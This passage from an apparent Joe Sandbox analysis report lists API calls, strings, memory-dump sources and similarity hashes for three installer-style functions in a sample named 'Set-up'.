                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                      Strings
                                      • Error launching installer, xrefs: 00405C74
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                      • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                      • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                      • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                      Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: CloseHandlelstrlenwvsprintf
                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                      • API String ID: 3509786178-2769509956
                                      • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                      • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                      • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                      • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                      Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                      • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                      • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                      • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4